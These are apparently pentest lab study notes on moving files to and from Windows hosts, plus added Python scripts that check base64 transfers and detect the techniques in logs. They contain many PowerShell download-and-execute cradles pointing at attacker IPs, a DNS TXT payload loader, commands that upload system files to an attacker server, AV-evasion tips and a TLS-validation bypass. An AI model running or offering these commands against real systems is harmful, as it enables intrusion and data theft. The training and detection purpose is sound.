Windows
Let's use the Microsoft Astaroth Attack blog post as an example of an advanced persistent threat (APT).
Download
PowerShell Base64 Encode & Decode
When you need to get a file onto a remote host but cannot transfer it over the network, you can simply convert it to a base64 string. The key point is to confirm that it arrived intact.
TimeLess613@htb[/htb]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278 id_rsa
TimeLess613@htb[/htb]$ cat id_rsa |base64 -w 0;echo (or: base64 id_rsa -w 0)
PS C:\htb> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64-strings>"))
PS C:\htb> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
Algorithm Hash Path
--------- ---- ----
MD5 4E301756A07DED0A2DD6953ABF015278 C:\Users\Public\id_rsa
-w 0: unlimited line width, i.e. the base64 output is not wrapped and comes out as a single line.
[!NOTE] Note: While this method is convenient, it's not always possible to use. Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.
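The two checks the section above relies on (an unwrapped base64 string and a matching hash on both ends) are easy to get subtly wrong: `base64` without `-w 0` wraps at 76 columns, `Get-FileHash` prints upper-case hex while `md5sum` prints lower-case, and cmd.exe caps the whole command line at 8,191 characters. The following Python script is an added example, not part of the original notes; it reproduces the encode/verify round trip and the length check against the page's `WriteAllBytes` one-liner (the `C:\Users\Public\id_rsa` path is the page's placeholder, and the sample file content is constructed).

```python
import base64
import hashlib

# cmd.exe's maximum command-line length, as noted on the page.
CMD_MAX_LEN = 8191

# The page's PowerShell one-liner, with the payload substituted for <base64-strings>.
# The destination path is the page's placeholder, not a real target.
PS_WRAPPER = ('[IO.File]::WriteAllBytes("C:\\Users\\Public\\id_rsa", '
              '[Convert]::FromBase64String("{b64}"))')


def md5_hex(data: bytes) -> str:
    """Hex MD5 of a byte string, lower-case as md5sum prints it."""
    return hashlib.md5(data).hexdigest()


def encode_for_transfer(data: bytes) -> tuple[str, str]:
    """Return (single-line base64, md5) for a file's bytes.

    b64encode never inserts line breaks, which is what `base64 -w 0` produces.
    """
    return base64.b64encode(data).decode("ascii"), md5_hex(data)


def decode_and_verify(b64: str, expected_md5: str) -> bytes:
    """Decode base64 that may have been wrapped or pasted with stray whitespace,
    then compare hashes case-insensitively: Get-FileHash prints upper-case hex and
    md5sum lower-case, so a naive string compare would report a false mismatch."""
    compact = "".join(b64.split())          # tolerate default 76-column wrapping
    data = base64.b64decode(compact, validate=True)
    if md5_hex(data) != expected_md5.strip().lower():
        raise ValueError("hash mismatch: file did not arrive intact")
    return data


def fits_in_cmd(b64: str) -> bool:
    """Does the complete one-liner fit within cmd.exe's 8,191-character limit?"""
    return len(PS_WRAPPER.format(b64=b64)) <= CMD_MAX_LEN


if __name__ == "__main__":
    # Constructed sample content; not a real key.
    sample = b"-----BEGIN FAKE KEY-----\n" + bytes(range(256)) * 12 + b"\n-----END FAKE KEY-----\n"
    b64, digest = encode_for_transfer(sample)
    print("md5:", digest, "| base64 length:", len(b64), "| fits cmd.exe:", fits_in_cmd(b64))
    # Receiving side: the hash pasted from Get-FileHash is upper-case.
    restored = decode_and_verify(b64, digest.upper())
    print("roundtrip ok:", restored == sample)
```

If `fits_in_cmd` returns False, the string has to go through a channel without the cmd.exe limit (the page's note applies) rather than be pasted as one command.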
PowerShell Web Downloads
Downloading scripts and strings
# Several ways to write the IEX cradle
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')
## Can also be piped
(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1') | IEX
#From cmd
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -
#From PSv3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1')
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
Downloading files
[!NOTE] When script/string downloads get caught by AV, transferring nc64 comes in handy.
# Simple: Invoke-WebRequest (aliases iwr, wget, curl); needs the "-OutFile" parameter. Reportedly slower.
Invoke-WebRequest -uri <attacker-IP>/nc64.exe -outfile [C:\Windows\Public\]nc64.exe
powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile('<url>','<output>')
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
## See LOLBAS
certutil.exe
## Download Microsoft Defender definitions
powershell -NoProfile -ExecutionPolicy Bypass -Command $d=new-object System.Net.WebClient;$d.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$d.DownloadFile('http://download.microsoft.com/download/DefinitionUpdates/mpam-fe.exe','c:\work\mpam-fe.exe')
PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource:
Method | Description
---|---
DownloadFile | Downloads data from a resource to a local file.
DownloadFileAsync | Downloads data from a resource to a local file without blocking the calling thread.
Error handling
-UseBasicParsing: bypasses the download being blocked because Internet Explorer's first-launch configuration has not been completed.
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
SSL certificate error. The callback below makes the session accept any certificate, so it also removes the protection against an interposed TLS endpoint for the rest of that PowerShell process.
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust
relationship for the SSL/TLS secure channel."
At line:1 char:1
+ IEX(New-Object Net.WebClient).DownloadString('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException
PS C:\htb> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
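Seen from the other side, every cradle in the two sections above leaves a distinctive string in PowerShell script block logging (Event ID 4104) or in process command lines. The following Python script is an added example, not part of the original notes: it runs a handful of pattern rules over constructed script-block texts (the page's own one-liners plus a benign one), so a defender can see which constructs are worth alerting on. The rule names are my own; the sample texts are constructed, not captured logs.

```python
import re

# Constructed sample script-block texts, modelled on the cradles shown on this
# page plus benign activity. Not real captured events; URLs are the page's examples.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')",
    "iex (iwr '10.10.14.9:8000/ipw.ps1')",
    "[IO.File]::WriteAllBytes(\"C:\\Users\\Public\\id_rsa\", [Convert]::FromBase64String(\"AAAA\"))",
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    ". (nslookup -q=txt some.owned.domain.com)[-1]",
    "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);"
    "$h.send();iex $h.responseText",
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\temp\\tool.zip",
]

# Each rule is (name, required patterns): a block matches the rule only when every
# pattern in the tuple is present. Matching is case-insensitive, as PowerShell is.
RULES = [
    ("iex_download_cradle",
     (r"\bIEX\b|Invoke-Expression",
      r"DownloadString|Invoke-WebRequest|\biwr\b|responseText|GetResponseStream")),
    ("base64_file_write", (r"WriteAllBytes", r"FromBase64String")),
    ("tls_validation_disabled",
     (r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}",)),
    ("dns_txt_code_load", (r"nslookup\s+-q=txt",)),
    ("web_download_to_disk", (r"DownloadFile(Async)?\(|-OutFile\b",)),
]
COMPILED = [(name, [re.compile(p, re.I) for p in pats]) for name, pats in RULES]


def scan_block(text: str) -> list[str]:
    """Return the names of all rules that match a single script block."""
    return [name for name, pats in COMPILED if all(p.search(text) for p in pats)]


def scan_blocks(blocks):
    """Return (index, matched rule names) for every block that hit at least one rule."""
    hits = []
    for i, text in enumerate(blocks):
        names = scan_block(text)
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for i, names in scan_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {i}: {', '.join(names)} :: {SAMPLE_SCRIPT_BLOCKS[i][:70]}")
```

The `tls_validation_disabled` rule is the one to treat as high-confidence on its own: there is no routine administrative reason to set that callback to `{$true}`, whereas `web_download_to_disk` matches plenty of legitimate scripts and is better used as context for the other rules.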
SMB Downloads
Create the SMB Server
This method can also be used for uploads. Note that when connecting to the smbserver, don't leave the /share part out of the path.
TimeLess613@htb[/htb]$ sudo impacket-smbserver -smb2support share /tmp/smbshare
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Copy a File from the SMB Server
New versions of Windows block unauthenticated guest access, as we can see in the following command:
C:\htb> copy \\192.168.220.133\share\nc.exe
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
So create a share that requires authentication and mount it on the target:
TimeLess613@htb[/htb]$ sudo impacket-smbserver -smb2support share /tmp/smbshare -user test -password test
Mount the SMB Server (to drive n:) with Username and Password
C:\htb> net use n: \\192.168.220.133\share /user:test test
The command completed successfully.
C:\htb> copy n:\nc.exe
1 file(s) copied.
[!NOTE] Note: You can also mount the SMB server if you receive an error when you use copy filename \\IP\sharename.
FTP Downloads
Setting up a Python3 FTP Server
TimeLess613@htb[/htb]$ sudo pip3 install pyftpdlib
TimeLess613@htb[/htb]$ sudo python3 -m pyftpdlib --port 21
[I 2022-05-17 10:09:19] concurrency model: async
[I 2022-05-17 10:09:19] masquerade (NAT) address: None
[I 2022-05-17 10:09:19] passive ports: None
[I 2022-05-17 10:09:19] >>> starting FTP server on 0.0.0.0:21, pid=3210 <<<
Transferring Files from an FTP Server Using PowerShell
PS C:\htb> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
Automating FTP operations
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET file.txt >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\htb>more file.txt
This is a test file
-s:ftpcommand.txt: specifies the command file
Upload
PowerShell Base64 Encode & Decode
PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
IyBD...<SNIP>...0DQo=
PS C:\htb> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash
Hash
----
3688374325B992DEF12793500307566D
The command above encodes as UTF-16LE, yet base64 -d can still decode it. This seems to be because -Encoding byte was used, which reads the specified file as raw bytes instead of with the system's default encoding (UTF-16LE on Windows). The file content is read directly into a byte array with no character-encoding conversion, which suits binary files or any case where you want to work with a file's raw bytes.
TimeLess613@htb[/htb]$ echo IyBD...<SNIP>...0DQo= | base64 -d > hosts
TimeLess613@htb[/htb]$ md5sum hosts
PowerShell Web Uploads
Installing a Configured WebServer with Upload
uploadserver, an extended module of the Python HTTP.server module
PowerShell Script to Upload a File to Python Upload Server
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373
Lab version (download the script locally first):
$me='10.10.14.221'; IEX (New-Object Net.WebClient).DownloadString("http://$($me):80/PSUpload.ps1"); Invoke-FileUpload -Uri "http://$($me):8000/upload" -File "C:\Windows\System32\drivers\etc\hosts"
One-line version (no need to download the script above; use sparingly, it seems to hang the clipboard):
function Invoke-FileUpload { Param ([Parameter(Position = 0, Mandatory = $True)] [String]$File, [Parameter(Position = 1, Mandatory = $True)] [String]$Uri) $FileToUpload = Get-ChildItem -File "$File"; $UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false); $boundary = '----timeless'; $tempFile = New-TemporaryFile; Remove-Item $tempFile -Force -ErrorAction Ignore; $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM); $fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName); $sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n"); $sw.Close(); $fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append); $bw = New-Object System.IO.BinaryWriter($fs); $fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName); $bw.Write($fileBinary); $bw.Close(); $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM); $sw.Write("`r`n--$boundary--`r`n"); $sw.Close(); Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile; $FileHash = Get-FileHash -Path "$File" -Algorithm MD5; Write-Host "[+] File Uploaded: " $FileToUpload.FullName; Write-Host "[+] FileHash: " $FileHash.Hash }; Invoke-FileUpload -Uri http://10.10.14.221:8000/upload -File upload_win.zip
PowerShell Base64 Web Upload
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)); Invoke-WebRequest -Uri http://10.10.14.221:8000/ -Method POST -Body $b64
To receive:
TimeLess613@htb[/htb]$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive
IyBDb3B5cm...SNIP...
TimeLess613@htb[/htb]$ echo <base64> | base64 -d -w 0 > hosts
SMB Uploads over HTTP
Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.
- For more information: Preventing SMB traffic from lateral connections and entering or leaving the network
An alternative is to run SMB over HTTP with WebDAV. WebDAV (RFC 4918) is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.
Configuring WebDav Server
TimeLess613@htb[/htb]$ sudo pip3 install wsgidav cheroot
TimeLess613@htb[/htb]$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connecting to the Webdav Share
When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.
C:\htb> dir \\192.168.49.128\DavWWWRoot
Volume in drive \\192.168.49.128\DavWWWRoot has no label.
Volume Serial Number is 0000-0000
Directory of \\192.168.49.128\DavWWWRoot
05/18/2022 10:05 AM <DIR> .
05/18/2022 10:05 AM <DIR> ..
05/18/2022 10:05 AM <DIR> sharefolder
05/18/2022 10:05 AM 13 filetest.txt
1 File(s) 13 bytes
3 Dir(s) 43,443,318,784 bytes free
- DavWWWRoot: refers to the root directory. Any other existing directory can be specified instead.
Uploading Files using SMB
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
[!note] If there is no SMB restriction, the impacket-smbserver method above can be used.
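Because the Windows client falls back from SMB to HTTP transparently, a WebDAV upload like the `copy ... \\host\DavWWWRoot\` above is recorded only in the web server's access log, not in any SMB telemetry. The following Python script is an added example, not part of the original notes or of wsgidav: it parses constructed combined-log-format lines and flags clients that issue WebDAV methods (PROPFIND, MKCOL, ...) or PUT, or that present the Windows WebDAV Mini-Redirector user agent. The log lines are constructed for the example; the user-agent prefix `Microsoft-WebDAV-MiniRedir` is the one the Windows client sends.

```python
import re

# Constructed access-log lines in combined log format (not real captures). The
# addresses and paths mirror the page's examples; the Windows WebDAV client
# identifies itself with the Microsoft-WebDAV-MiniRedir user agent.
SAMPLE_LOG = [
    '192.168.49.129 - - [18/May/2022:10:05:01 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '192.168.49.129 - - [18/May/2022:10:05:01 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '192.168.49.129 - - [18/May/2022:10:05:02 +0000] "PROPFIND /sharefolder/ HTTP/1.1" 207 380 "-" "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '192.168.49.129 - - [18/May/2022:10:05:03 +0000] "PUT /sharefolder/SourceCode.zip HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir/10.0.19041"',
    '10.0.0.7 - - [18/May/2022:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    'this line is not in log format',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Methods that only exist in WebDAV; a plain browser never sends them.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
WINDOWS_DAV_CLIENT = "Microsoft-WebDAV-MiniRedir"


def parse_line(line: str):
    """Parse one combined-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def summarize(lines):
    """Per client IP: count of WebDAV-only methods, PUT paths, and whether the
    Windows WebDAV client was seen. Unparseable lines are skipped."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip.setdefault(
            rec["ip"], {"webdav_methods": 0, "puts": [], "windows_redirector": False})
        if rec["method"] in WEBDAV_METHODS:
            entry["webdav_methods"] += 1
        if rec["method"] == "PUT":
            entry["puts"].append(rec["path"])
        if WINDOWS_DAV_CLIENT in rec["ua"]:
            entry["windows_redirector"] = True
    return per_ip


def flagged_clients(lines):
    """Sorted list of client IPs showing any WebDAV activity or an upload."""
    return sorted(ip for ip, e in summarize(lines).items()
                  if e["puts"] or e["webdav_methods"] or e["windows_redirector"])


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

On a server that is not meant to serve WebDAV at all, any PROPFIND or PUT is worth an alert; on one that is, the PUT paths per client are the useful field for tracing what was written.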
FTP Uploads
Similar to downloading, but start the server with --write: allows writing to the server.
PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Automating FTP operations
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
PUT
Misc
WinRM
LOL
To search for download and upload functions in LOLBAS we can use /download or /upload.